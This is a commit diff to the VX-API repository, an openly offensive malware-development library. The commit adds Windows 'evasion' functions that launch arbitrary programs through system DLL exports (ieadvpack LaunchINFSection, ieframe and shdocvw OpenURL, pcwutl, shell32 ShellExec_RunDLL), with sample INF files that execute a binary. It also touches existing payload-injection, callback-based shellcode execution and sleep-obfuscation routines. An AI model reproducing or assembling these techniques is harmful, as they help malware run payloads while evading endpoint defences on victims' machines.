Version: 2.0.684

Version: 2.0.684

README.md

@@ -3,7 +3,7 @@ managed by [vx-underground](https://vx-underground.org) | follow us on [Twitter]
   
 # VX-API
 
-Version: 2.0.658
+Version: 2.0.684
 
 Developer: smelly__vx
   
@@ -103,6 +103,13 @@ You're free to use this in any manner you please. You do not need to use this en
 | CopyFileViaSetupCopyFile | smelly__vx | Evasion |
 | CreateProcessFromINFSectionInstallStringNoCab | smelly__vx | Evasion |
 | CreateProcessFromINFSetupCommand | smelly__vx | Evasion |
+| CreateProcessFromINFSectionInstallStringNoCab2 | smelly__vx | Evasion |
+| CreateProcessFromIeFrameOpenUrl | smelly__vx | Evasion |
+| CreateProcessFromPcwUtil | smelly__vx | Evasion |
+| CreateProcessFromShdocVwOpenUrl | smelly__vx | Evasion |
+| CreateProcessFromShell32ShellExecRunDll | smelly__vx | Evasion |
+
+| CreateProcessFromPcwUtil | smelly__vx | Evasion |
 | GetCurrentLocaleFromTeb | 3xp0rt | Fingerprinting |
 | GetNumberOfLinkedDlls | smelly__vx | Fingerprinting |
 | GetOsBuildNumberFromPeb | smelly__vx | Fingerprinting |
@@ -150,6 +157,8 @@ You're free to use this in any manner you please. You do not need to use this en
 | WriteDataToPeSection | smelly__vx | Helper Functions | 
 | GetPeSectionSizeInByte | smelly__vx | Helper Functions | 
 | ReadDataFromPeSection | smelly__vx | Helper Functions | 
+| GetCurrentProcessNoForward | ReactOS | Helper Functions | 
+| GetCurrentThreadNoForward | ReactOS | Helper Functions | 
 | GetKUserSharedData | Geoff Chappell | Library Loading |
 | GetModuleHandleEx2 | smelly__vx | Library Loading |
 | GetPeb | 29a | Library Loading |

VX-API/CreateProcessFromINFSectionInstallStringNoCab2.cpp

@@ -0,0 +1,115 @@
+#include "Win32Helper.h"
+
+/*
+
+Example .inf file
+_______________
+///////////////
+‾‾‾‾‾‾‾‾‾‾‾‾‾‾‾
+[version]
+signature = $Chicago$
+AdvancedInf = 2.5
+
+[DefaultInstall_SingleUser]
+RunPostSetupCommands = Tag1
+
+[Tag1]
+C:\Windows\system32\calc.exe
+_______________
+///////////////
+‾‾‾‾‾‾‾‾‾‾‾‾‾‾‾
+*/
+
+BOOL CreateProcessFromINFSectionInstallStringNoCab2W(LPCWSTR PathToInfFile, LPCWSTR NameOfSection)
+{
+	typedef HRESULT(WINAPI* LAUNCHINFSECTIONW)(HWND, HINSTANCE, PWSTR, INT);
+	LAUNCHINFSECTIONW LaunchINFSectionW = NULL;
+	HMODULE hMod = NULL;
+	BOOL bFlag = FALSE;
+	WCHAR InfExecutionBuffer[MAX_PATH * 2] = { 0 };
+
+	hMod = LoadLibraryW(L"ieadvpack.dll");
+	if (hMod == NULL)
+		goto EXIT_ROUTINE;
+
+	LaunchINFSectionW = (LAUNCHINFSECTIONW)GetProcAddressA((DWORD64)hMod, "LaunchINFSectionW");
+	if (!LaunchINFSectionW)
+		goto EXIT_ROUTINE;
+
+	if (StringCopyW(InfExecutionBuffer, PathToInfFile) == NULL)
+		goto EXIT_ROUTINE;
+
+	if (StringConcatW(InfExecutionBuffer, L",") == NULL)
+		goto EXIT_ROUTINE;
+
+	if (StringConcatW(InfExecutionBuffer, NameOfSection) == NULL)
+		goto EXIT_ROUTINE;
+
+	if (StringConcatW(InfExecutionBuffer, L",") == NULL)
+		goto EXIT_ROUTINE;
+
+	if (StringConcatW(InfExecutionBuffer, L"1") == NULL)
+		goto EXIT_ROUTINE;
+
+	if (StringConcatW(InfExecutionBuffer, L",") == NULL)
+		goto EXIT_ROUTINE;
+
+	if (!SUCCEEDED(LaunchINFSectionW(NULL, NULL, InfExecutionBuffer, 0)))
+		goto EXIT_ROUTINE;
+
+	bFlag = TRUE;
+
+EXIT_ROUTINE:
+
+	if (hMod)
+		FreeLibrary(hMod);
+
+	return bFlag;
+}
+
+BOOL CreateProcessFromINFSectionInstallStringNoCab2A(LPCSTR PathToInfFile, LPCSTR NameOfSection)
+{
+	typedef HRESULT(WINAPI* LAUNCHINFSECTION)(HWND, HINSTANCE, PSTR, INT);
+	LAUNCHINFSECTION LaunchINFSection = NULL;
+	HMODULE hMod = NULL;
+	BOOL bFlag = FALSE;
+	CHAR InfExecutionBuffer[MAX_PATH * 2] = { 0 };
+
+	hMod = LoadLibraryW(L"ieadvpack.dll");
+	if (hMod == NULL)
+		goto EXIT_ROUTINE;
+
+	LaunchINFSection = (LAUNCHINFSECTION)GetProcAddressA((DWORD64)hMod, "LaunchINFSection");
+	if (!LaunchINFSection)
+		goto EXIT_ROUTINE;
+
+	if (StringCopyA(InfExecutionBuffer, PathToInfFile) == NULL)
+		goto EXIT_ROUTINE;
+
+	if (StringConcatA(InfExecutionBuffer, ",") == NULL)
+		goto EXIT_ROUTINE;
+
+	if (StringConcatA(InfExecutionBuffer, NameOfSection) == NULL)
+		goto EXIT_ROUTINE;
+
+	if (StringConcatA(InfExecutionBuffer, ",") == NULL)
+		goto EXIT_ROUTINE;
+
+	if (StringConcatA(InfExecutionBuffer, "1") == NULL)
+		goto EXIT_ROUTINE;
+
+	if (StringConcatA(InfExecutionBuffer, ",") == NULL)
+		goto EXIT_ROUTINE;
+
+	if (!SUCCEEDED(LaunchINFSection(NULL, NULL, InfExecutionBuffer, 0)))
+		goto EXIT_ROUTINE;
+
+	bFlag = TRUE;
+
+EXIT_ROUTINE:
+
+	if (hMod)
+		FreeLibrary(hMod);
+
+	return bFlag;
+}

VX-API/CreateProcessFromINFSectionInstallStringNoCab3.cpp

@@ -0,0 +1,53 @@
+#include "Win32Helper.h"
+
+/*
+
+Example .inf file
+_______________
+///////////////
+‾‾‾‾‾‾‾‾‾‾‾‾‾‾‾
+; ----------------------------------------------------------------------
+; Required Sections
+; ----------------------------------------------------------------------
+[Version]
+Signature=$CHICAGO$
+Provider=test
+Class=Printer
+
+[Manufacturer]
+HuntressLabs=ModelsSection,NTx86,NTia64,NTamd64
+
+; ----------------------------------------------------------------------
+; Models Section
+; ----------------------------------------------------------------------
+[ModelsSection.NTx86]
+UnregisterDlls = Squiblydoo
+
+[ModelsSection.NTia64]
+UnregisterDlls = Squiblydoo
+
+[ModelsSection.NTamd64]
+UnregisterDlls = Squiblydoo
+
+; ----------------------------------------------------------------------
+; Support Sections
+; ----------------------------------------------------------------------
+[DefaultInstall]
+UnregisterDlls = Squiblydoo
+
+[Squiblydoo]
+calc.exe
+_______________
+///////////////
+‾‾‾‾‾‾‾‾‾‾‾‾‾‾‾
+*/
+
+BOOL CreateProcessFromINFSectionInstallStringNoCab3W(LPCWSTR PathToInfFile, LPCWSTR NameOfSection)
+{
+	return FALSE;
+}
+
+BOOL CreateProcessFromINFSectionInstallStringNoCab3A(LPCSTR PathToInfFile, LPCSTR NameOfSection)
+{
+	return FALSE;
+}

VX-API/CreateProcessFromIeFrameOpenUrl.cpp

@@ -0,0 +1,59 @@
+#include "Win32Helper.h"
+
+BOOL CreateProcessFromIeFrameOpenUrlW(LPCWSTR PathToUrlFile)
+{
+	typedef VOID(WINAPI* OPENURL)(HWND, HINSTANCE, LPCSTR);
+	OPENURL OpenUrl = NULL;
+	HMODULE hMod = NULL;
+	BOOL bFlag = FALSE;
+	CHAR ccPathToUrlFile[MAX_PATH] = { 0 };
+
+	if (WCharStringToCharString(ccPathToUrlFile, (PWCHAR)PathToUrlFile, StringLengthW(PathToUrlFile)) == 0)
+		goto EXIT_ROUTINE;
+
+	hMod = LoadLibraryW(L"ieframe.dll");
+	if (hMod == NULL)
+		goto EXIT_ROUTINE;
+
+	OpenUrl = (OPENURL)GetProcAddressA((DWORD64)hMod, "OpenURL");
+	if (!OpenUrl)
+		goto EXIT_ROUTINE;
+
+	OpenUrl(NULL, NULL, ccPathToUrlFile);
+
+	bFlag = TRUE;
+
+EXIT_ROUTINE:
+
+	if (hMod)
+		FreeLibrary(hMod);
+
+	return bFlag;
+}
+
+BOOL CreateProcessFromIeFrameOpenUrlA(LPCSTR PathToUrlFile)
+{
+	typedef VOID(WINAPI* OPENURL)(HWND, HINSTANCE, LPCSTR);
+	OPENURL OpenUrl = NULL;
+	HMODULE hMod = NULL;
+	BOOL bFlag = FALSE;
+
+	hMod = LoadLibraryW(L"ieframe.dll");
+	if (hMod == NULL)
+		goto EXIT_ROUTINE;
+
+	OpenUrl = (OPENURL)GetProcAddressA((DWORD64)hMod, "OpenUrl");
+	if (!OpenUrl)
+		goto EXIT_ROUTINE;
+
+	OpenUrl(NULL, NULL, PathToUrlFile);
+
+	bFlag = TRUE;
+
+EXIT_ROUTINE:
+
+	if (hMod)
+		FreeLibrary(hMod);
+
+	return bFlag;
+}

VX-API/CreateProcessFromPcwUtil.cpp

@@ -0,0 +1,59 @@
+#include "Win32Helper.h"
+
+BOOL CreateProcessFromPcwUtilW(LPCWSTR PathToBinary)
+{
+	typedef VOID(WINAPI* LAUNCHAPPLICATIONW)(HWND, HINSTANCE, LPCWSTR);
+	LAUNCHAPPLICATIONW LaunchApplicationW = NULL;
+	HMODULE hMod = NULL;
+	BOOL bFlag = FALSE;
+
+	hMod = LoadLibraryW(L"pcwutl.dll");
+	if (hMod == NULL)
+		goto EXIT_ROUTINE;
+
+	LaunchApplicationW = (LAUNCHAPPLICATIONW)GetProcAddressA((DWORD64)hMod, "LaunchApplicationW");
+	if (!LaunchApplicationW)
+		goto EXIT_ROUTINE;
+
+	LaunchApplicationW(NULL, NULL, PathToBinary);
+
+	bFlag = TRUE;
+
+EXIT_ROUTINE:
+
+	if (hMod)
+		FreeLibrary(hMod);
+
+	return bFlag;
+}
+
+BOOL CreateProcessFromPcwUtilA(LPCSTR PathToBinary)
+{
+	typedef VOID(WINAPI* LAUNCHAPPLICATIONW)(HWND, HINSTANCE, LPCWSTR);
+	LAUNCHAPPLICATIONW LaunchApplicationW = NULL;
+	HMODULE hMod = NULL;
+	BOOL bFlag = FALSE;
+	WCHAR wBinaryPath[MAX_PATH * sizeof(WCHAR)] = { 0 };
+
+	if (CharStringToWCharString(wBinaryPath, (PCHAR)PathToBinary, StringLengthA(PathToBinary)) == NULL)
+		goto EXIT_ROUTINE;
+
+	hMod = LoadLibraryW(L"pcwutl.dll");
+	if (hMod == NULL)
+		goto EXIT_ROUTINE;
+
+	LaunchApplicationW = (LAUNCHAPPLICATIONW)GetProcAddressA((DWORD64)hMod, "LaunchApplicationW");
+	if (!LaunchApplicationW)
+		goto EXIT_ROUTINE;
+
+	LaunchApplicationW(NULL, NULL, wBinaryPath);
+
+	bFlag = TRUE;
+
+EXIT_ROUTINE:
+
+	if (hMod)
+		FreeLibrary(hMod);
+
+	return bFlag;
+}

VX-API/CreateProcessFromShdocVwOpenUrl.cpp

@@ -0,0 +1,58 @@
+#include "Win32Helper.h"
+
+BOOL CreateProcessFromShdocVwOpenUrlW(LPCWSTR PathToUrlFile)
+{
+	typedef VOID(WINAPI* OPENURL)(HWND, HINSTANCE, LPCSTR);
+	OPENURL OpenUrl = NULL;
+	HMODULE hMod = NULL;
+	BOOL bFlag = FALSE;
+	CHAR ccPathToUrlFile[MAX_PATH] = { 0 };
+
+	if (WCharStringToCharString(ccPathToUrlFile, (PWCHAR)PathToUrlFile, StringLengthW(PathToUrlFile)) == 0)
+		goto EXIT_ROUTINE;
+
+	hMod = LoadLibraryW(L"shdocvw.dll");
+	if (hMod == NULL)
+		goto EXIT_ROUTINE;
+
+	OpenUrl = (OPENURL)GetProcAddressA((DWORD64)hMod, "OpenURL");
+	if (!OpenUrl)
+		goto EXIT_ROUTINE;
+
+	OpenUrl(NULL, NULL, ccPathToUrlFile);
+
+	bFlag = TRUE;
+
+EXIT_ROUTINE:
+
+	if (hMod)
+		FreeLibrary(hMod);
+
+	return bFlag;
+}
+BOOL CreateProcessFromShdocVwOpenUrlA(LPCSTR PathToUrlFile)
+{
+	typedef VOID(WINAPI* OPENURL)(HWND, HINSTANCE, LPCSTR);
+	OPENURL OpenUrl = NULL;
+	HMODULE hMod = NULL;
+	BOOL bFlag = FALSE;
+
+	hMod = LoadLibraryW(L"shdocvw.dll");
+	if (hMod == NULL)
+		goto EXIT_ROUTINE;
+
+	OpenUrl = (OPENURL)GetProcAddressA((DWORD64)hMod, "OpenUrl");
+	if (!OpenUrl)
+		goto EXIT_ROUTINE;
+
+	OpenUrl(NULL, NULL, PathToUrlFile);
+
+	bFlag = TRUE;
+
+EXIT_ROUTINE:
+
+	if (hMod)
+		FreeLibrary(hMod);
+
+	return bFlag;
+}

VX-API/CreateProcessFromShell32ShellExecRunDll.cpp

@@ -0,0 +1,50 @@
+#include "Win32Helper.h"
+
+BOOL CreateProcessFromShell32ShellExecRunDllW(LPCWSTR PathToFile)
+{
+	typedef VOID(WINAPI* SHELLEXEC_RUNDLLW)(HWND, HINSTANCE, LPCWSTR, INT);
+	SHELLEXEC_RUNDLLW ShellExec_RunDllW = NULL;
+	HMODULE hMod = NULL;
+	BOOL bFlag = FALSE;
+
+	hMod = TryLoadDllMultiMethodW((PWCHAR)L"shell32.dll");
+	if (hMod == NULL)
+		goto EXIT_ROUTINE;
+
+	ShellExec_RunDllW = (SHELLEXEC_RUNDLLW)GetProcAddressA((DWORD64)hMod, "ShellExec_RunDLLW");
+	if (!ShellExec_RunDllW)
+		goto EXIT_ROUTINE;
+
+	ShellExec_RunDllW(NULL, NULL, PathToFile, SW_SHOW);
+
+	bFlag = TRUE;
+
+EXIT_ROUTINE:
+
+
+	return bFlag;
+}
+
+BOOL CreateProcessFromShell32ShellExecRunDllA(LPCSTR PathToFile)
+{
+	typedef VOID(WINAPI* SHELLEXEC_RUNDLLA)(HWND, HINSTANCE, LPCSTR, INT);
+	SHELLEXEC_RUNDLLA ShellExec_RunDllA = NULL;
+	HMODULE hMod = NULL;
+	BOOL bFlag = FALSE;
+
+	hMod = TryLoadDllMultiMethodW((PWCHAR)L"shell32.dll");
+	if (hMod == NULL)
+		goto EXIT_ROUTINE;
+
+	ShellExec_RunDllA = (SHELLEXEC_RUNDLLA)GetProcAddressA((DWORD64)hMod, "ShellExec_RunDLLA");
+	if (!ShellExec_RunDllA)
+		goto EXIT_ROUTINE;
+
+	ShellExec_RunDllA(NULL, NULL, PathToFile, SW_SHOW);
+
+	bFlag = TRUE;
+
+EXIT_ROUTINE:
+
+	return bFlag;
+}

VX-API/GetCurrentProcessNoForward.cpp

@@ -0,0 +1,6 @@
+#include "Win32Helper.h"
+
+HANDLE GetCurrentProcessNoForward(VOID)
+{
+	return (HANDLE)((HANDLE)-1);
+}

VX-API/GetCurrentThreadNoForward.cpp

@@ -0,0 +1,6 @@
+#include "Win32Helper.h"
+
+HANDLE GetCurrentThreadNoForward(VOID)
+{
+	return ((HANDLE)(LONG_PTR)-2);
+}

VX-API/GetCurrentUserSid.cpp

@@ -19,7 +19,7 @@ LPWSTR GetCurrentUserSidW(VOID)
 	LPWSTR pSid = NULL;
 	HANDLE hToken = NULL;
 
-	if (!OpenProcessToken(InlineGetCurrentProcess, TOKEN_ALL_ACCESS, &hToken))
+	if (!OpenProcessToken(GetCurrentProcessNoForward(), TOKEN_ALL_ACCESS, &hToken))
 		return NULL;
 
 	dwError = GetTokenInformationBufferSize(hToken);
@@ -84,7 +84,7 @@ LPSTR GetCurrentUserSidA(VOID)
 	LPSTR pSid = NULL;
 	HANDLE hToken = NULL;
 
-	if (!OpenProcessToken(InlineGetCurrentProcess, TOKEN_ALL_ACCESS, &hToken))
+	if (!OpenProcessToken(GetCurrentProcessNoForward(), TOKEN_ALL_ACCESS, &hToken))
 		return NULL;
 
 	dwError = GetTokenInformationBufferSize(hToken);

VX-API/IsIntelHardwareBreakpointPresent.cpp

@@ -13,7 +13,7 @@ BOOL IsIntelHardwareBreakpointPresent(VOID)
 
 	Context->ContextFlags = CONTEXT_DEBUG_REGISTERS;
 
-	if (!GetThreadContext(InlineGetCurrentThread, Context))
+	if (!GetThreadContext(GetCurrentThreadNoForward(), Context))
 		goto EXIT_ROUTINE;
 
 	if (Context->Dr0 || Context->Dr1 || Context->Dr2 || Context->Dr3)

VX-API/IsProcessRunningAsAdmin.cpp

@@ -7,7 +7,7 @@ BOOL IsProcessRunningAsAdmin(VOID)
 	DWORD dwSize = 0;
 	BOOL bFlag = FALSE;
 
-	if (!OpenProcessToken(InlineGetCurrentProcess, TOKEN_QUERY, &hToken))
+	if (!OpenProcessToken(GetCurrentProcessNoForward(), TOKEN_QUERY, &hToken))
 		goto EXIT_ROUTINE;
 
 	if (!GetTokenInformation(hToken, TokenElevation, &Elevation, sizeof(Elevation), &dwSize))

VX-API/Main.cpp

@@ -9,7 +9,7 @@ INT main(VOID)
 	
 	//BOOL bFlag = AmsiBypassViaPatternScan(4288);
 	
-	CreateProcessFromINFSectionInstallStringNoCabA("C:\\Users\\dwThr\\Desktop\\demo.inf", "DefaultInstall_SingleUser");
+	CreateProcessFromShell32ShellExecRunDllW(L"C:\\Windows\\System32\\calc.exe");
 
 	return ERROR_SUCCESS;
 }

VX-API/MpfPiControlInjection.cpp

@@ -29,7 +29,7 @@ BOOL MpfPiControlInjection(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes, _I
 	if (!RtlEncodeRemotePointer)
 		goto EXIT_ROUTINE;
 
-	if (!K32GetModuleInformation(InlineGetCurrentProcess, hKernelbase, &KernelbaseInformation, sizeof(KernelbaseInformation)))
+	if (!K32GetModuleInformation(GetCurrentProcessNoForward(), hKernelbase, &KernelbaseInformation, sizeof(KernelbaseInformation)))
 		goto EXIT_ROUTINE;
 
 	KernelBaseDefaultHandler = (PCHAR)MemoryFindMemory(hKernelbase, KernelbaseInformation.SizeOfImage, (PVOID)"\x48\x83\xec\x28\xb9\x3a\x01\x00\xc0", 9);

VX-API/MpfSceViaEnumDirTreeW.cpp

@@ -4,12 +4,12 @@ VOID InvokeEnumDirTreeWThreadCallbackRoutine(LPVOID lpParameter)
 {
 	WCHAR DisposeableBuffer[512] = { 0 };
 
-	if (!SymInitialize(InlineGetCurrentProcess, NULL, TRUE))
+	if (!SymInitialize(GetCurrentProcessNoForward(), NULL, TRUE))
 		return;
 
-	EnumDirTreeW(InlineGetCurrentProcess, L"C:\\Windows", L"*.log", DisposeableBuffer, (PENUMDIRTREE_CALLBACKW)lpParameter, NULL);
+	EnumDirTreeW(GetCurrentProcessNoForward(), L"C:\\Windows", L"*.log", DisposeableBuffer, (PENUMDIRTREE_CALLBACKW)lpParameter, NULL);
 
-	SymCleanup(InlineGetCurrentProcess);
+	SymCleanup(GetCurrentProcessNoForward());
 }
 
 BOOL MpfSceViaEnumDirTreeW(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)

VX-API/MpfSceViaEnumerateLoadedModules64.cpp

@@ -2,7 +2,7 @@
 
 VOID InvokeEnumerateLoadedModules64CallbackRoutine(LPVOID lpParameter)
 {
-	EnumerateLoadedModules64(InlineGetCurrentProcess, (PENUMLOADED_MODULES_CALLBACK64)lpParameter, NULL);
+	EnumerateLoadedModules64(GetCurrentProcessNoForward(), (PENUMLOADED_MODULES_CALLBACK64)lpParameter, NULL);
 }
 
 BOOL MpfSceViaEnumerateLoadedModules64(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)

VX-API/MpfSceViaSymEnumProcesses.cpp

@@ -2,7 +2,7 @@
 
 VOID InvokeSymEnumProcessesCallbackRoutine(LPVOID lpParameter)
 {
-	if (!SymInitializeW(GetCurrentProcess(), NULL, FALSE))
+	if (!SymInitializeW(GetCurrentProcessNoForward(), NULL, FALSE))
 		return;
 
 #pragma warning( push )
@@ -10,7 +10,7 @@ VOID InvokeSymEnumProcessesCallbackRoutine(LPVOID lpParameter)
 	SymEnumProcesses((PSYM_ENUMPROCESSES_CALLBACK)lpParameter, NULL);
 #pragma warning( pop ) 
 
-	SymCleanup(GetCurrentProcess());
+	SymCleanup(GetCurrentProcessNoForward());
 
 }
 

VX-API/MpfSceViaSymEnumSourceFiles.cpp

@@ -2,12 +2,12 @@
 
 VOID InvokeSymEnumSourceFilesCallbackRoutine(LPVOID lpParameter)
 {
-	if (!SymInitializeW(GetCurrentProcess(), NULL, TRUE))
+	if (!SymInitializeW(GetCurrentProcessNoForward(), NULL, TRUE))
 		return;
 
-	SymEnumSourceFilesW(GetCurrentProcess(), NULL, NULL, (PSYM_ENUMSOURCEFILES_CALLBACKW)lpParameter, NULL);
+	SymEnumSourceFilesW(GetCurrentProcessNoForward(), NULL, NULL, (PSYM_ENUMSOURCEFILES_CALLBACKW)lpParameter, NULL);
 
-	SymCleanup(GetCurrentProcess());
+	SymCleanup(GetCurrentProcessNoForward());
 }
 
 BOOL MpfSceViaSymEnumSourceFiles(_In_ PBYTE Payload, _In_ DWORD PayloadSizeInBytes)

VX-API/MpfSceViaVerifierEnumerateResource.cpp

@@ -16,7 +16,7 @@ VOID InvokeVerifierEnumerateResourceCallbackRoutine(LPVOID lpParameter)
 	if (!VerifierEnumerateResource)
 		return;
 
-	VerifierEnumerateResource(GetCurrentProcess(), NULL, 0, (AVRF_RESOURCE_ENUMERATE_CALLBACK)lpParameter, NULL);
+	VerifierEnumerateResource(GetCurrentProcessNoForward(), NULL, 0, (AVRF_RESOURCE_ENUMERATE_CALLBACK)lpParameter, NULL);
 
 	return;
 }

VX-API/ProxyWorkItemLoadLibrary.cpp

@@ -18,7 +18,7 @@ HMODULE ProxyWorkItemLoadLibraryW(_In_ LPCWSTR lpModuleName)
 
 	Timeout.QuadPart = -500000;
 
-	NtWaitForSingleObject(InlineGetCurrentProcess, FALSE, &Timeout);
+	NtWaitForSingleObject(GetCurrentProcessNoForward(), FALSE, &Timeout);
 
 	return GetModuleHandleEx2W(lpModuleName);
 }
@@ -41,7 +41,7 @@ HMODULE ProxyWorkItemLoadLibraryA(_In_ LPCSTR lpModuleName)
 
 	Timeout.QuadPart = -500000;
 
-	NtWaitForSingleObject(InlineGetCurrentProcess, FALSE, &Timeout);
+	NtWaitForSingleObject(GetCurrentProcessNoForward(), FALSE, &Timeout);
 
 	return GetModuleHandleEx2A(lpModuleName);
 }

VX-API/SetHardwareBreakpoint.cpp

@@ -13,7 +13,7 @@ BOOL SetHardwareBreakpoint(_In_ DWORD ThreadId, _In_ PUINT_VAR_T Address, _In_ U
 			goto EXIT_ROUTINE;
 	}
 	else
-		hHandle = InlineGetCurrentThread;
+		hHandle = GetCurrentThreadNoForward();
 
 	if (!GetThreadContext(hHandle, &Context))
 		goto EXIT_ROUTINE;

VX-API/SetProcessPrivilegeToken.cpp

@@ -2,7 +2,7 @@
 
 BOOL SetProcessPrivilegeToken(_In_ DWORD PrivilegeEnum)
 {
-	HANDLE Process = InlineGetCurrentProcess;
+	HANDLE Process = GetCurrentProcessNoForward();
 	HANDLE Token = INVALID_HANDLE_VALUE;
 	TOKEN_PRIVILEGES Privileges = { 0 };
 	DWORD TokenLength = 0;

VX-API/SleepObfuscationViaVirtualProtect.cpp

@@ -97,7 +97,7 @@ BOOL SleepObfuscationViaVirtualProtect(_In_ DWORD dwSleepTimeInMilliseconds, _In
 	// WaitForSingleObject
 	RopWaitForSingleObject.Rsp -= 8;
 	RopWaitForSingleObject.Rip = (DWORD64)WaitForSingleObject;
-	RopWaitForSingleObject.Rcx = (DWORD64)InlineGetCurrentProcess;
+	RopWaitForSingleObject.Rcx = (DWORD64)GetCurrentProcessNoForward();
 	RopWaitForSingleObject.Rdx = dwSleepTimeInMilliseconds;
 
 	// SystemFunction032

VX-API/VX-API.vcxproj

@@ -152,11 +152,17 @@
     <ClCompile Include="CreateMd5HashFromFilePath.cpp" />
     <ClCompile Include="CreateProcessByWindowsRHotKey.cpp" />
     <ClCompile Include="CreateProcessByWindowsRHotKeyEx.cpp" />
+    <ClCompile Include="CreateProcessFromIeFrameOpenUrl.cpp" />
     <ClCompile Include="CreateProcessFromIHxHelpPaneServer.cpp" />
     <ClCompile Include="CreateProcessFromIHxInteractiveUser.cpp" />
     <ClCompile Include="CreateProcessFromINFSectionInstallStringNoCab.cpp" />
+    <ClCompile Include="CreateProcessFromINFSectionInstallStringNoCab2.cpp" />
+    <ClCompile Include="CreateProcessFromINFSectionInstallStringNoCab3.cpp" />
     <ClCompile Include="CreateProcessFromINFSetupCommand.cpp" />
     <ClCompile Include="CreateProcessFromIShellDispatchInvoke.cpp" />
+    <ClCompile Include="CreateProcessFromPcwUtil.cpp" />
+    <ClCompile Include="CreateProcessFromShdocVwOpenUrl.cpp" />
+    <ClCompile Include="CreateProcessFromShell32ShellExecRunDll.cpp" />
     <ClCompile Include="CreateProcessFromShellExecuteInExplorerProcess.cpp" />
     <ClCompile Include="CreateProcessViaNtCreateUserProcess.cpp" />
     <ClCompile Include="CreateProcessWithCfGuard.cpp" />
@@ -173,6 +179,8 @@
     <ClCompile Include="ExceptHandlerCallbackRoutine.cpp" />
     <ClCompile Include="Ex_GetHandleOnDeviceHttpCommunication.cpp" />
     <ClCompile Include="FastcallExecuteBinaryShellExecuteEx.cpp" />
+    <ClCompile Include="GetCurrentProcessNoForward.cpp" />
+    <ClCompile Include="GetCurrentThreadNoForward.cpp" />
     <ClCompile Include="GetPeSectionSizeInBytes.cpp" />
     <ClCompile Include="IsPeSection.cpp" />
     <ClCompile Include="LzMaximumCompressBuffer.cpp" />

VX-API/VX-API.vcxproj.filters

@@ -771,6 +771,30 @@
     <ClCompile Include="CreateProcessFromINFSetupCommand.cpp">
       <Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
     </ClCompile>
+    <ClCompile Include="CreateProcessFromPcwUtil.cpp">
+      <Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
+    </ClCompile>
+    <ClCompile Include="GetCurrentProcessNoForward.cpp">
+      <Filter>Source Files\Windows API Helper Functions\Helper Functions</Filter>
+    </ClCompile>
+    <ClCompile Include="GetCurrentThreadNoForward.cpp">
+      <Filter>Source Files\Windows API Helper Functions\Helper Functions</Filter>
+    </ClCompile>
+    <ClCompile Include="CreateProcessFromINFSectionInstallStringNoCab2.cpp">
+      <Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
+    </ClCompile>
+    <ClCompile Include="CreateProcessFromIeFrameOpenUrl.cpp">
+      <Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
+    </ClCompile>
+    <ClCompile Include="CreateProcessFromINFSectionInstallStringNoCab3.cpp">
+      <Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
+    </ClCompile>
+    <ClCompile Include="CreateProcessFromShdocVwOpenUrl.cpp">
+      <Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
+    </ClCompile>
+    <ClCompile Include="CreateProcessFromShell32ShellExecRunDll.cpp">
+      <Filter>Source Files\Windows API Helper Functions\Evasion</Filter>
+    </ClCompile>
   </ItemGroup>
   <ItemGroup>
     <ClInclude Include="Internal.h">

VX-API/Win32Helper.h

@@ -47,9 +47,6 @@
 
 #define Get16Bits(d) ((((UINT32)(((CONST UINT8*)(d))[1])) << 8) +(UINT32)(((CONST UINT8*)(d))[0]))
 
-#define InlineGetCurrentThread ((HANDLE)(LONG_PTR)-2)
-#define InlineGetCurrentProcess (HANDLE)((HANDLE)-1)
-
 /*******************************************
  RAD HARDWARE BREAKPOINT HOOKING ENGINE DATA
 *******************************************/
@@ -221,6 +218,8 @@ DWORD GetPeSectionSizeInBytesW(_In_ LPCWSTR Path, _In_ LPCWSTR SectionName);
 DWORD GetPeSectionSizeInBytesA(_In_ LPCSTR Path, _In_ LPCSTR SectionName);
 BOOL ReadDataFromPeSectionW(_In_ LPCWSTR Path, _In_ LPCWSTR SectionName, _Inout_ PBYTE ReadData, _Inout_opt_ PDWORD DataReadInBytes);
 BOOL ReadDataFromPeSectionA(_In_ LPCSTR Path, _In_ LPCSTR SectionName, _Inout_ PBYTE ReadData, _Inout_opt_ PDWORD DataReadInBytes);
+HANDLE GetCurrentProcessNoForward(VOID);
+HANDLE GetCurrentThreadNoForward(VOID);
 
 
 
@@ -364,6 +363,18 @@ BOOL CreateProcessFromINFSectionInstallStringNoCabW(LPCWSTR PathToInfFile, LPCWS
 BOOL CreateProcessFromINFSectionInstallStringNoCabA(LPCSTR PathToInfFile, LPCSTR NameOfSection);
 BOOL CreateProcessFromINFSetupCommandW(LPCWSTR PathToInfFile, LPCWSTR NameOfSection);
 BOOL CreateProcessFromINFSetupCommandA(LPCSTR PathToInfFile, LPCSTR NameOfSection);
+BOOL CreateProcessFromPcwUtilW(LPCWSTR PathToBinary);
+BOOL CreateProcessFromPcwUtilA(LPCSTR PathToBinary);
+BOOL CreateProcessFromINFSectionInstallStringNoCab2A(LPCSTR PathToInfFile, LPCSTR NameOfSection);
+BOOL CreateProcessFromINFSectionInstallStringNoCab2W(LPCWSTR PathToInfFile, LPCWSTR NameOfSection);
+BOOL CreateProcessFromIeFrameOpenUrlW(LPCWSTR PathToUrlFile);
+BOOL CreateProcessFromIeFrameOpenUrlA(LPCSTR PathToUrlFile);
+BOOL CreateProcessFromINFSectionInstallStringNoCab3W(LPCWSTR PathToInfFile, LPCWSTR NameOfSection); // <--- not implemented
+BOOL CreateProcessFromINFSectionInstallStringNoCab3A(LPCSTR PathToInfFile, LPCSTR NameOfSection); // <--- not implemented
+BOOL CreateProcessFromShdocVwOpenUrlW(LPCWSTR PathToUrlFile);
+BOOL CreateProcessFromShdocVwOpenUrlA(LPCSTR PathToUrlFile);
+BOOL CreateProcessFromShell32ShellExecRunDllW(LPCWSTR PathToFile);
+BOOL CreateProcessFromShell32ShellExecRunDllA(LPCSTR PathToFile);